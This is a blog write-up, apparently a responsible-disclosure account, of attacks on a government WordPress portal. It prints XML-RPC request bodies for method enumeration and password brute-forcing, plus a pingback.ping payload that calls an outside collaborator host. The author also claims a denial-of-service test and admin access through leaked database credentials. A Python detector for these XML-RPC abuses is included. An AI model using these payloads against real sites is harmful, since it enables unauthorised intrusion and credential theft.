This is how I hacked National Informatics Centre (NIC) Portal

Pranjal_y2j
4 min read, Dec 3, 2022


Note: All the vulnerabilities have been patched by the government. I am only publishing this for educational purposes. 😄

BUGS INDEX

1. Plugins/Updates
2. Information Disclosure
3. XMLRPC (All Operations)
4. DDoS Attack
5. Bruteforce
6. Database Access

1. PLUGINS/UPDATE

The site was running WordPress version 4.1.23, which is an outdated release.

# WordPress <= 4.9.6 — Authenticated Arbitrary File Deletion :
This can lead to code execution and can be easily exploited by any authenticated user.

# BigBlueButton < 2.2.4
This can lead to reflected cross-site scripting (XSS) via closed captions, because the plugin renders them with React's dangerouslySetInnerHTML.

2. Information Disclosure

While scanning the site I found a link that exposed a large amount of internal data, which an attacker could make use of.

3. XMLRPC

XML-RPC on WordPress is an API that lets developers talk to a WordPress site remotely. It can do many things, such as PUBLISH, EDIT and DELETE posts and UPLOAD files.

OUTPUT :

<script src="/wp-content/plugins/bigbluebutton/js/jquery.min.js"></script>
<script>
//commented
$( document ).ready(function() {
    $('#reload').click(function() {
        $("#captchas").attr("src", "captcha.php?"+(new Date()).getTime());
    });
});
</script>

XML-RPC server accepts POST requests only.

OPERATIONS ON XMLRPC :

Ok, when I found XML-RPC I tried every operation, and seriously, all of them succeeded, so I'm going to show all the possible attacks. First of all, I checked which methods I could call.

Request body (sent via Burp Repeater):

<methodCall>
  <methodName>system.listMethods</methodName>
  <params></params>
</methodCall>

Almost all operations are present, so I can change, delete, create and upload anything, e.g.: pingback.ping, mt.publishPost, metaWeblog.getPost, metaWeblog.newPost, metaWeblog.deletePost, wp.getUsersBlogs, wp.getCategories, metaWeblog.getUsersBlogs.

BRUTE FORCING PASSWORDS:

Before brute-forcing, we first have to find usernames, which I had already done:

USERNAMES FOUND :

# superadmin

# Guru e

# Admin

# Test user

# user

Brute-force request (POST body, sent via Repeater):

<methodCall>
  <methodName>wp.getUsersBlogs</methodName>
  <params>
    <param><value>admin</value></param>
    <param><value>pass</value></param>
  </params>
</methodCall>

This means I was able to brute-force the login easily.

4. Cross-Site Port Attack

Time to craft a request via Burp to get a pingback to my own server. The POST data (sent via Repeater) is:

<methodCall>
  <methodName>pingback.ping</methodName>
  <params>
    <param><value><string>http://k8tvf0ppfiioiuz0rt5b8ha22t8jw8.burpcollaborator.net</string></value></param>
    <param><value><string>https://webcon.nic.in/?page_id=255</string></value></param>
  </params>
</methodCall>

The response returned a fault code and a value, which means the port is open, and I could verify it on my own server: I used my Burp Collaborator and saw the request in its logs!

4. INTERNAL DDoS ATTACK

After all this, I ran an internal DDoS attack and found that the site could be taken down: it kept accepting any number of requests.

5. BRUTEFORCE :

After that, I took a wordlist of passwords to check whether the endpoint kept accepting requests when I attacked with passwords in bulk, and yes, I found NO RATE LIMIT. I used a 1000-password wordlist.
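As an added example (not code from the original post), here is a small Python detector for the XML-RPC abuses shown above: credential checking through wp.getUsersBlogs, pingback.ping with a source URL outside the site, and, going one step beyond the post, system.multicall bundling many logins into one request (the reason a per-request rate limit on xmlrpc.php is not enough). The sample bodies are constructed to match the post's requests; webcon.nic.in is the host from the post, collaborator.example is a placeholder, and the set of credential-taking methods is deliberately reduced to the two named in the post (a real deployment would list every method that accepts a username and password).

```python
import xml.etree.ElementTree as ET
from collections import Counter
from urllib.parse import urlparse

SITE_HOST = "webcon.nic.in"  # the site's own host (from the post); pingbacks sourced elsewhere are suspect
LOGIN_METHODS = {"wp.getUsersBlogs", "metaWeblog.getUsersBlogs"}  # methods that take username + password

def _text(value_el):  # text of a <value>, with or without a <string> wrapper (both forms appear in the post)
    child = value_el.find("*")
    return ((child.text if child is not None else value_el.text) or "").strip()

def classify(body):
    """Return findings for one XML-RPC request body; an empty list means nothing suspicious."""
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return ["malformed XML"]
    method = (root.findtext("methodName") or "").strip()
    findings = []
    if method in LOGIN_METHODS:
        findings.append("login attempts: 1")
    elif method == "pingback.ping":
        src = root.find("params/param/value")  # sourceURI: the server will fetch this URL itself
        host = urlparse(_text(src)).hostname if src is not None else None
        if host != SITE_HOST:
            findings.append(f"pingback source outside site: {host}")
    elif method == "system.multicall":
        # one multicall can wrap hundreds of login attempts, so count the inner calls, not requests
        names = [m.find("value") for m in root.iter("member") if m.findtext("name") == "methodName"]
        logins = sum(1 for v in names if v is not None and _text(v) in LOGIN_METHODS)
        if logins:
            findings.append(f"login attempts: {logins} via system.multicall")
    return findings

def flag_bruteforce(requests, threshold=20):  # (client_ip, body) pairs -> IPs at or over the login threshold
    attempts = Counter()
    for ip, body in requests:
        attempts[ip] += sum(int(f.split()[2]) for f in classify(body) if f.startswith("login attempts: "))
    return {ip: n for ip, n in attempts.items() if n >= threshold}

# Constructed sample bodies, shaped like the requests shown in the post (not captured traffic).
LOGIN = ("<methodCall><methodName>wp.getUsersBlogs</methodName><params>"
         "<param><value>admin</value></param><param><value>pass</value></param></params></methodCall>")
PINGBACK = ("<methodCall><methodName>pingback.ping</methodName><params><param><value><string>http://collaborator.example/x"
            "</string></value></param><param><value><string>https://webcon.nic.in/?page_id=255</string></value></param></params></methodCall>")
_CALL = ("<value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member>"
         "<member><name>params</name><value><array><data><value>admin</value><value>pw{}</value></data></array>"
         "</value></member></struct></value>")
MULTICALL = ("<methodCall><methodName>system.multicall</methodName><params><param><value><array><data>"
             + "".join(_CALL.format(i) for i in range(3)) + "</data></array></value></param></params></methodCall>")
```

Feeding each request body to classify() and the per-IP tallies to flag_bruteforce() is enough to alert on the pattern the post describes; in front of a real site the bodies would come from a WAF or access log that records POST payloads to xmlrpc.php.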

6. DATABASES :

While scanning the site I found a file named config.php,

where I found DATABASE CREDENTIALS xD!!!! (somebody give me poison)

Then I was able to find the main admin setup of the website!

From here I was able to CREATE and DELETE servers and users, and I could create a new admin as well.

NOTE: I already reported the Vulnerabilities and all have been patched now.

Also received acknowledgment from NCIIPC.

Follow me :

Instagram: https://www.instagram.com/pranjal_y2j_/

Twitter: https://twitter.com/pranjal_y2j

Thank you !

Pranjal Sharma.
